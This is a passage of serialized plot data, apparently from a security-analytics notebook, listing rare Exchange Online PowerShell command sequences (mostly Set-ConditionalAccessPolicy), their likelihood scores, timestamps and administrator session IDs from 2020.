'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"]],\"rarest_window3_likelihood\":{\"__ndarray__\":\"DEfG329aUj8MR8bfb1pSP3V87L8x5v8+N9Fsy2iqDz/GT9MSaxukP6KEmi2evp8/xk/TEmsbpD9t4/U462MPP8ZP0xJrG6Q/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz8IcaoIJuQjP8ZP0xJrG6Q/ooSaLZ6+nz/GT9MSaxukP6KEmi2evp8/xk/TEmsbpD+ihJotnr6fP6pVKhfDwCY/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz/GT9MSaxukP8ZP0xJrG6Q/xk/TEmsbpD+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP5W5Uk+XEUc/ooSaLZ6+nz+ihJotnr6fP/tJOnBySJo+ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/YoPR+JLmuD7srItQt5mgPqKEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/lblST5cRRz+ihJotnr6fP6KEmi2evp8/lblST5cRRz+ihJotnr6fP6KEmi2evp8/lblST5cRRz/KgPnKTqiuPqKEmi2evp8/ooSaLZ6+nz+000QHIBUVP7TTRAcgFRU/tNNEByAVFT+ZGsKep5CVPoGXvoUKvDQ/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/SsRdKoOslz9KxF0qg6yXP0rEXSqDrJc/SsRdKoOslz+ihJotnr6fP0rEXSqDrJc/SsRdKoOslz9KxF0qg6yXP0rEXSqDrJc/SsRdKoOslz9KxF0qg6yXP0rEXSqDrJc/SsRdKoOslz9KxF0qg6yXP0rEXSqDrJc/SsRdKoOslz9KxF0qg6yXP6KEmi2evp8/SsRdKoOslz+ihJotnr6fP6pVKhfDwCY/ooSaLZ6+nz9KxF0qg6yXP8ZP0xJrG6Q/K4hu8P71IT/GT9MSaxukP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP8ZP0xJrG6Q/xk/TEmsbpD+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz+ihJotnr6fP6KEmi2evp8/ooSaLZ6+nz8=\",\"dtype\":\"float64\",\"shape\":[127]},\"time_col\":[\"2020-03-31 02:19:26+00:00\",\"2020-04-01 20:12:19+00:00\",\"2020-04-02 09:01:22+00:00\",\"2020-04-02 14:02:50+00:00\",\"2020-04-02 14:05:54+00:00\",\"2020-04-04 10:43:38+00:00\",\"2020-04-05 21:17:39+00:00\",\"2020-04-06 08:25:34+00:00\",\"2020-04-06 08:40:49+00:00\",\"2020-04-06 08:45:08+00:00\",\"2020-04-06 18:28:22+00:00\",\"2020-04-07 19:29:10+00:00\",\"2020-04-07 21:50:17+00:00\",\"2020-04-08 16:29:58+00:00\",\"2020-04-08 16:38:23+00:00\",\"2020-04-08 16:45:26+00:00\",\"2020-04-08 16:59:37+00:00\",\"2020-04-08 17:03:19+00:00\",\"2020-04-08 17:31:38+00:00\",\"2020-04-08 17:35:18+00:00\",\"2020-04-09 16:56:54+00:00\",\"2020-04-09 17:01:23+00:00\",\"2020-04-09 17:17:28+00:00\",\"2020-04-09 17:21:53+00:00\",\"2020-04-09 17:26:16+00:00\",\"2020-04-09 17:38:32+00:00\",\"2020-04-09 17:52:48+00:00\",\"2020-04-09 18:09:58+00:00\",\"2020-04-15 03:13:51+00:00\",\"2020-04-15 06:14:35+00:00\",\"2020-04-16 02:49:02+00:00\",\"2020-04-16 06:06:35+00:00\",\"2020-04-16 22:46:54+00:00\",\"2020-04-17 03:29:24+00:00\",\"2020-04-17 06:13:17+00:00\",\"2020-04-17 21:00:31+00:00\",\"2020-04-18 01:38:36+00:00\",\"2020-04-18 04:50:30+00:00\",\"2020-04-19 02:55:49+00:00\",\"2020-04-20 03:02:34+00:00\",\"2020-04-20 06:04:29+00:00\",\"2020-04-22 03:12:39+00:00\",\"2020-04-23 06:07:23+00:00\",\"2020-04-23 21:42:48+00:00\",\"2020-04-24 03:12:12+00:00\",\"2020-04-24 06:00:47+00:00\",\"2020-04-25 06:18:01+00:00\",\"2020-04-26 02:42:04+00:00\",\"2020-04-26 06:09:29+00:00\",\"2020-04-27 03:17:16+00:00\",\"2020-04-28 06:08:58+00:00\",\"2020-04-29 15:01:44+00:00\",\"2020-04-30 02:48:54+00:00\",\"2020-04-30 06:02:13+00:00\",\"2020-04-30 22:09:32+00:00\",\"2020-05-01 03:11:34+00:00\",\"2020-05-01 05:59:09+00:00\",\"2020-05-01 10:55:14+00:00\",\"2020-05-02 11:31:53+00:00\",\"2020-05-05 02:56:24+00:00\",\"2020-05-05 06:21:38+00:00\",\"2020-05-05 16:47:31+00:00\",\"2020-05-05 16:55:05+00:00\",\"2020-05-05 17:23:30+00:00\",\"2020-05-06 01:49:17+00:00\",\"2020-05-06 02:51:10+00:00\",\"2020-05-08 03:12:52+00:00\",\"2020-05-08 05:52:11+00:00\",\"2020-05-09 02:58:45+00:00\",\"2020-05-11 01:58:14+00:00\",\"2020-05-11 04:57:16+00:00\",\"2020-05-14 02:07:32+00:00\",\"2020-05-14 05:04:33+00:00\",\"2020-05-15 03:09:56+00:00\",\"2020-05-16 06:05:56+00:00\",\"2020-05-16 06:48:04+00:00\",\"2020-05-16 09:20:17+00:00\",\"2020-05-16 15:22:05+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-17 03:04:51+00:00\",\"2020-05-17 03:14:05+00:00\",\"2020-05-17 03:54:47+00:00\",\"2020-05-17 09:56:20+00:00\",\"2020-05-17 15:57:55+00:00\",\"2020-05-17 21:59:40+00:00\",\"2020-05-18 04:01:35+00:00\",\"2020-05-18 09:02:19+00:00\",\"2020-05-18 10:03:01+00:00\",\"2020-05-18 12:12:55+00:00\",\"2020-05-18 15:02:53+00:00\",\"2020-05-18 18:15:15+00:00\",\"2020-05-18 22:41:41+00:00\",\"2020-05-19 01:58:06+00:00\",\"2020-05-19 04:43:13+00:00\",\"2020-05-19 05:13:27+00:00\",\"2020-05-19 09:54:28+00:00\",\"2020-05-19 10:02:31+00:00\",\"2020-05-19 10:45:23+00:00\",\"2020-05-19 11:14:31+00:00\",\"2020-05-19 13:29:55+00:00\",\"2020-05-19 13:44:48+00:00\",\"2020-05-19 13:48:08+00:00\",\"2020-05-19 13:55:42+00:00\",\"2020-05-19 13:58:13+00:00\",\"2020-05-19 14:01:02+00:00\",\"2020-05-19 14:06:06+00:00\",\"2020-05-19 14:27:14+00:00\",\"2020-05-19 14:30:31+00:00\",\"2020-05-12 01:34:59+00:00\",\"2020-05-12 04:48:43+00:00\",\"2020-05-20 02:18:27+00:00\",\"2020-05-20 05:12:55+00:00\",\"2020-05-21 01:50:12+00:00\",\"2020-05-21 04:32:03+00:00\",\"2020-05-22 02:13:21+00:00\",\"2020-05-22 04:54:58+00:00\",\"2020-05-23 01:46:21+00:00\",\"2020-05-23 04:49:40+00:00\",\"2020-05-24 02:02:29+00:00\",\"2020-05-24 04:39:22+00:00\",\"2020-05-25 02:12:22+00:00\",\"2020-05-25 04:52:01+00:00\",\"2020-05-26 02:14:37+00:00\",\"2020-05-26 04:46:11+00:00\",\"2020-05-27 01:49:10+00:00\",\"2020-05-28 02:01:50+00:00\",\"2020-05-28 05:11:20+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1757\"},\"selection_policy\":{\"id\":\"1758\"}},\"id\":\"1712\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"end\":1591395907100.0,\"start\":1584867938900.0},\"id\":\"1696\",\"type\":\"Range1d\"},{\"attributes\":{\"data_source\":{\"id\":\"1712\"},\"glyph\":{\"id\":\"1714\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1715\"},\"selection_glyph\":null,\"view\":{\"id\":\"1717\"}},\"id\":\"1716\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"ClientIP\":[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\"UserId\":[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\",\"NAMPRD06\\\\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker)\"],\"begin\":{\"__ndarray__\":\"AAB7LuYSd0IAgEv4dRN3QgAArfmhE3dCAACxObMTd0IAAJ1msxN3QgAAOZ9MFHdCAIBTTMMUd0IAAEOE6RR3QgCApmPqFHdCAADiouoUd0IAAFcCDBV3QgAAt+JhFXdCAIDa9WkVd0IAAHcHqhV3QgCAwYKqFXdCAAAH6qoVd0IAgMq5qxV3QgCA/e+rFXdCAADJjq0Vd0IAAH/ErRV3QgAAv/f9FXdCAIBrOf4Vd0IAAAQl/xV3QgCAtmX/FXdCAADspf8Vd0IAAJxZABZ3QgAAmCoBFndCAAAPJgIWd0IAgNlBvRd3QgCAT5nHF3dCAAATPA4Yd0IAgN+JGRh3QgAA88ZSGHdCAAAi8WIYd0IAgMRRbBh3QgCAWRafGHdCAADW/64Yd0IAAN/6uRh3QgCAsNAFGXdCAABRmVgZd0IAgBwCYxl3QgCAhfj9GXdCAIDXXVoad0IAADzkjxp3QgAAbr2iGndCAIDpYqwad0IAgBrF/xp3QgAAhs9FG3dCAIDarVEbd0IAAOY4mht3QgAAyXH2G3dCAAC8U2ccd0IAAJ/Kjxx3QgCAaNqaHHdCAAAWNNIcd0IAAGd84xx3QgCAPBPtHHdCAABlBP4cd0IAgAKDUh13QgAAPDUsHndCAACV8zced0IAgMvDWx53QgCAojJcHndCAADl0l0ed0IAgNTDeh53QgAAU05+HndCAACyVyQfd0IAgG91LR93QgCAqO51H3dCAACvQxcgd0IAAD6CISB3QgAAKv0OIXdCAIAuHhkhd0IAAPr0ZCF3QgAA2mzBIXdCAAAK1sMhd0IAgMaLzCF3QgCAlD/hIXdCAIBo8vUhd0IAgAN2CSJ3QgCARP0JIndCAIB1UQwid0IAAJoBISJ3QgCAO7I1IndCAABOZUoid0IAgNEaXyJ3QgCAF1BwIndCAIBAyXMid0IAgBU4eyJ3QgCA1PGEIndCAICz848id0IAgIgynyJ3QgAAu2+qIndCAIBu4rMid0IAgE2dtSJ3QgAAwrHFIndCAICtJ8Yid0IAgJubyCJ3QgCAXUbKIndCAIDDBdIid0IAAMjf0iJ3QgAAnBDTIndCAABzf9Mid0IAgFCk0yJ3QgAAk83TIndCAADLF9Qid0IAAF1N1SJ3QgCAdX3VIndCAIDbVGggd0IAgL9qcyB3QgCAk//9IndCAIA9+wcjd0IAAILHTiN3QgCAWwpYI3dCAIBegKIjd0IAAM2/qyN3QgCAnFrzI3dCAADq1/0jd0IAgLCsRiR3QgAAyaZPJHdCAAA3o5kkd0IAgNbFoiR3QgCA7CnsJHdCAIAj1vQkd0IAAN8aPSV3QgAAKzqQJXdCAAAMEpsld0I=\",\"dtype\":\"float64\",\"shape\":[127]},\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,2,3,5,6,7,8,10,11,12,13,14,16,17,19,21,22,23,24,25,26,27,29,30,31,32,34,36,38,39,41,43,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,62,63,64,65,68,71,73,74,75,76,77,80,87,88,90,91,92,94,96,100,101,105,108,110,124,126,132,140,141,142,146,153,155,156,159,162,168,172,177,182,183,185,187,190,193,195,199,200,207,208,211,216,220,221,222,224,225,226,227,229,230,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251],\"rarest_window3\":[[\"Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'})\",\"Cmd(name='Set-User', params={'ErrorAction', 'Identity', 'SyncMailboxLocationGuids'})\"],[\"Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'})\",\"Cmd(name='Set-User', params={'ErrorAction', 'Identity', 'SyncMailboxLocationGuids'})\"],[\"Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'})\",\"Cmd(name='Remove-MailboxLocation', params={'ErrorAction', 'Identity', 'Confirm'})\",\"Cmd(name='Set-User', params={'ErrorAction', 'Identity', 'SyncMailboxLocationGuids'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='New-ConditionalAccessPolicy', params={'Organization'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='New-ConditionalAccessPolicy', params={'Organization'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\"],[\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 'TenantDefaultPolicy'})\",\"Cmd(name='Set-ConditionalAccessPolicy', params={'PolicyLastUpdatedTime', 'PolicyIdentifierString', 'PolicyDetails', 'Identity', 'DisplayName', 